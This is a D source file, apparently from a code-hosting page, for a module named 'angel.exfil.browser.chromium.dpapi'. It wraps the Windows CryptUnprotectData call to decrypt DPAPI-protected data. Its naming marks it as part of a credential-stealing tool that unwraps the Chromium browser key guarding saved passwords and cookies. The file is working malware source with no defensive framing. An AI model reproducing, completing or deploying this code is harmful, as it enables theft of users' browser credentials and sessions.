46 lines
974 B
D
46 lines
974 B
D
module angel.exfil.browser.chromium.dpapi;
|
|
|
|
// Internal imports
|
|
import angel.utils.logging;
|
|
// External imports
|
|
import core.sys.windows.windows;
|
|
import core.stdc.stdlib;
|
|
import std.string;
|
|
|
|
extern(Windows)
|
|
{
|
|
BOOL CryptUnprotectData(
|
|
const(DATA_BLOB)* pDataIn,
|
|
LPCWSTR* ppszDataDescr,
|
|
const(DATA_BLOB)* pOptionalEntropy,
|
|
void* pvReserved,
|
|
void* pPromptStruct,
|
|
uint dwFlags,
|
|
DATA_BLOB* pDataOut
|
|
);
|
|
}
|
|
|
|
extern(Windows)
|
|
struct DATA_BLOB
|
|
{
|
|
uint cbData;
|
|
ubyte* pbData;
|
|
}
|
|
|
|
ubyte[] dpapi(ubyte[] key_crypt) {
|
|
DATA_BLOB inBlob;
|
|
DATA_BLOB outBlob;
|
|
|
|
inBlob.pbData = key_crypt.ptr;
|
|
inBlob.cbData = cast(uint) key_crypt.length;
|
|
|
|
if (CryptUnprotectData(&inBlob, null, null, null, null, 0, &outBlob)) {
|
|
ubyte[] decrypted = cast(ubyte[])(outBlob.pbData[0 .. outBlob.cbData]).idup;
|
|
|
|
free(outBlob.pbData);
|
|
|
|
return decrypted;
|
|
} else {
|
|
return [];
|
|
}
|
|
} |